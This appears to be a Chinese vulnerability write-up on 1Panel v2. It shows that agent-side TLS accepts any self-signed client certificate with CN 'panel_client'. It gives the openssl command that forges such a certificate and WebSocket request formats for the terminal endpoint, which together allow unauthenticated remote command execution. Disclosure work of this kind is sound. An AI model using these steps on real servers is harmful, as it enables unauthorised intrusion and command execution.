### 漏洞简述
* 首先引入1panel v2 Core端与Agent端的概念,新版本发布后,1panel增加了节点管理的功能,可以通过添加节点来控制其他的主机。
* 而Core端与Agent端通讯所使用的https协议,在证书校验中未完全校验证书的真实性导致接口未授权。1panel中由于存在大量命令执行或高权限的接口,导致RCE。
[](https://private-user-images.githubusercontent.com/55079338/471203530-ebd0b388-d6c0-4678-98ee-47646e69ebe9.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NTQzODM0MzcsIm5iZiI6MTc1NDM4MzEzNywicGF0aCI6Ii81NTA3OTMzOC80NzEyMDM1MzAtZWJkMGIzODgtZDZjMC00Njc4LTk4ZWUtNDc2NDZlNjllYmU5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTA4MDUlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwODA1VDA4Mzg1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTc0ODRkOWYyOWZhZDU3YmZhNWZkMGUyZDlkOWNkYzRiZTNhNGY3ZWM2NDgyMGYwMGZmMjU1MDc3NmEyMTY5NjUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.vZjEEJpKymhTPlrb9iI1nLysGQpndE1X4NuzETMqieU)
### 代码审计过程
1. 首先我们进入到Agent HTTP路由文件`agent/init/router/router.go`
[](https://private-user-images.githubusercontent.com/55079338/471203643-dd9152a9-6677-4674-b75f-3b67dcedb321.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NTQzODM0MzcsIm5iZiI6MTc1NDM4MzEzNywicGF0aCI6Ii81NTA3OTMzOC80NzEyMDM2NDMtZGQ5MTUyYTktNjY3Ny00Njc0LWI3NWYtM2I2N2RjZWRiMzIxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTA4MDUlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwODA1VDA4Mzg1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTAzZjAxYzU2YWNlMDVmZTMzMTUxOWEyYmJmM2RlZTU2MDQ0M2RkNzZhNGQyMGRjNjZlYWQ0OTA2NjMyMjY2ZjEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.tlD-BRWD6jlUUE7htOSdRCxk3vGxktAuWb3PPbs-sbE)
2. 发现`Routers`函数中引用`Certificate`函数进行了全局校验`agent/middleware/certificate.go`
[](https://private-user-images.githubusercontent.com/55079338/471203710-5585f251-61e0-4603-8e9e-f50465f265ae.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NTQzODM0MzcsIm5iZiI6MTc1NDM4MzEzNywicGF0aCI6Ii81NTA3OTMzOC80NzEyMDM3MTAtNTU4NWYyNTEtNjFlMC00NjAzLThlOWUtZjUwNDY1ZjI2NWFlLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTA4MDUlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwODA1VDA4Mzg1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTY3MjI3NzI4OTdhNzE5OGYxN2Y5MWFlZmQ0MTdlZGUyMmJmNjVkZDFjYjI1YzNkYjA4MjJhOWQzMGE0MjI4ZTEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.qdDLDzIlDhokH5FtbYcSA8haic3h67dT1FuK5ttEOtg)
3. 发现`Certificate`函数判断了`c.Request.TLS.HandshakeComplete`是否进行了证书通讯
[](https://private-user-images.githubusercontent.com/55079338/471203768-5a50bdec-cc4d-4439-9b7b-98991ca4ff9c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NTQzODM0MzcsIm5iZiI6MTc1NDM4MzEzNywicGF0aCI6Ii81NTA3OTMzOC80NzEyMDM3NjgtNWE1MGJkZWMtY2M0ZC00NDM5LTliN2ItOTg5OTFjYTRmZjljLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTA4MDUlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwODA1VDA4Mzg1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTVjNzI3ZjA1OTcxM2JjMGRiZDNkOThiMGIzM2EyZmUwYmRkZDY1NmMyZTAzY2NiZjhjZGM5YWRhYmNmNDViZWMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.2_1IrGiloGtQxSjZ4ERGylLb-XjQm-P5ZuUHBDrl5mw)
4. 由于`c.Request.TLS.HandshakeComplete`的真假判断是通过`agent/server/server.go`代码`Start`函数中的`tls.RequireAnyClientCert`来判断的
[](https://private-user-images.githubusercontent.com/55079338/471203824-3785b245-6e1f-44ff-9760-708b3e76560b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NTQzODM0MzcsIm5iZiI6MTc1NDM4MzEzNywicGF0aCI6Ii81NTA3OTMzOC80NzEyMDM4MjQtMzc4NWIyNDUtNmUxZi00NGZmLTk3NjAtNzA4YjNlNzY1NjBiLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTA4MDUlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwODA1VDA4Mzg1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWZkZWY4MjgzZDVjYzJlZjY4ZGRlMzdjMmE3MGI4MjBjNjkxODg4YjA3YmEzNTA4MDEwZmJjNTg2MmZiODA5MDImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.yQmqmWjsaUqbZUfVnKXRo_EO8Qx2dhjvMR0QTBa4uNI)
注:`此处由于使用tls.RequireAnyClientCert而不是tls.RequireAndVerifyClientCert,RequireAnyClientCert只要求客户端提供证书,不验证证书的签发CA,所以任何自签名证书都能通过TLS握手。`
5. 后续进入`Certificate`函数中的其他判断,只验证了证书CN字段为panel\_client,未验证证书签发者。最后发现WebSocket连接可以绕过Proxy-ID验证。
[](https://private-user-images.githubusercontent.com/55079338/471203891-f521d75a-cd72-41b8-b90f-f10ffb923484.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NTQzODM0MzcsIm5iZiI6MTc1NDM4MzEzNywicGF0aCI6Ii81NTA3OTMzOC80NzEyMDM4OTEtZjUyMWQ3NWEtY2Q3Mi00MWI4LWI5MGYtZjEwZmZiOTIzNDg0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTA4MDUlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwODA1VDA4Mzg1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWJmODg3YjRhMWI2MWUwMmZkMGUwZWFiN2IyYjNjY2Y1YjE4ZGY2YTVjNjkxZGEyYjliNTcxYjcxMmE2YzNjOTgmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.Xnne9e95Dkhv6Y_55aQoRoQLDs4qnR9uA_N2719Udk8)
6. 项目中存在大量的websocket接口。
* Process WebSocket 接口(根据上述问题可获取所有的进程等敏感信息)
路由地址: `/process/ws`
请求格式如下
{
"type": "ps", // 数据类型: ps(进程), ssh(SSH会话), net(网络连接), wget(下载进度)
"pid": 123, // 可选,指定进程ID进行筛选
"name": "process_name", // 可选,根据进程名筛选
"username": "user" // 可选,根据用户名筛选
}
[](https://private-user-images.githubusercontent.com/55079338/471204004-011dc303-9316-4160-ad98-165c032f6e49.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NTQzODM0MzcsIm5iZiI6MTc1NDM4MzEzNywicGF0aCI6Ii81NTA3OTMzOC80NzEyMDQwMDQtMDExZGMzMDMtOTMxNi00MTYwLWFkOTgtMTY1YzAzMmY2ZTQ5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTA4MDUlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwODA1VDA4Mzg1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWI1M2EyMDZkN2MzOWVlNjg1ZWU5OTE5NWE3ODM5YzE1NWU4MWM4YThmNjIxZjhlNGE0YTZlYWZlMDVkNmY4ODUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.fnVepsFnhdM-d9DHZCUIcX0EkldS_8vbwOis2ZlA3r8)
* Terminal SSH WebSocket 接口(根据上述问题可执行任意命令)
路由地址: `/hosts/terminal`
请求格式如下
{
"type": "cmd",
"data": "d2hvYW1pCg==" // "whoami" 的base64编码,记住不要忘记回车。
}
[](https://private-user-images.githubusercontent.com/55079338/471204034-6f2ac997-8b32-4cb6-a64c-be33db845a76.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NTQzODM0MzcsIm5iZiI6MTc1NDM4MzEzNywicGF0aCI6Ii81NTA3OTMzOC80NzEyMDQwMzQtNmYyYWM5OTctOGIzMi00Y2I2LWE2NGMtYmUzM2RiODQ1YTc2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTA4MDUlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwODA1VDA4Mzg1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWIwMjE0NGE2MTBkMTg4YjZlNzU3ZjEyNGE1OTk2YTFlZDkyOTcwZGE4Njg5MjcxZDhhZGE5YmM3ODBmMGEzYjImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.kPyTPPPpiDzmh5gg4fyIR6f-_cG77wB12Xzq5NT-nBA)
* Container Terminal WebSocket 接口(容器执行命令接口)
路由地址: `/containers/terminal`
* File Download Process WebSocket 接口(自动推送下载进度信息)
路由地址: `/files/wget/process`
### 攻击过程
1. 首先生成伪造证书
`openssl req -x509 -newkey rsa:2048 -keyout panel_client.key -out panel_client.crt -days 365 -nodes -subj "/CN=panel_client"`
2. 然后使用证书请求验证,如果成功连接websocket接口则存在漏洞
[](https://private-user-images.githubusercontent.com/55079338/471204168-9e3016f8-ebe0-4dc9-b797-405c6a4aec89.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NTQzODM0MzcsIm5iZiI6MTc1NDM4MzEzNywicGF0aCI6Ii81NTA3OTMzOC80NzEyMDQxNjgtOWUzMDE2ZjgtZWJlMC00ZGM5LWI3OTctNDA1YzZhNGFlYzg5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTA4MDUlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwODA1VDA4Mzg1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTQ2MTVlYTJhZWUyZDhjMDJkN2E1NDBmZTEwZjgyMTQ0OTUyMzI0MGE5YTM5NmU2ZWIxNjc3YzgwZjdlYzliOTEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.w1MUJGCb8tBDxyf3fihXNEwA5svZwZjz8emydRKm9w4)
[](https://private-user-images.githubusercontent.com/55079338/471204194-8076ad9c-da30-452f-9f42-83ae1d66f9ac.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NTQzODM0MzcsIm5iZiI6MTc1NDM4MzEzNywicGF0aCI6Ii81NTA3OTMzOC80NzEyMDQxOTQtODA3NmFkOWMtZGEzMC00NTJmLTlmNDItODNhZTFkNjZmOWFjLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTA4MDUlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwODA1VDA4Mzg1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWYwMjRmYjNmZjM2MmRkODAxYzY0MWVmMGEwNDkwODI3ZDkyZTBkOGFiMzI4YTM1MjgxZjBmZjIxMTlmNTUyNjUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.ydgO81NR8GLXBs9DNVZH9o-etkcmgOvXOOWVJI2ISnQ)
京公网安备 11010502034610号
Unavailable Comments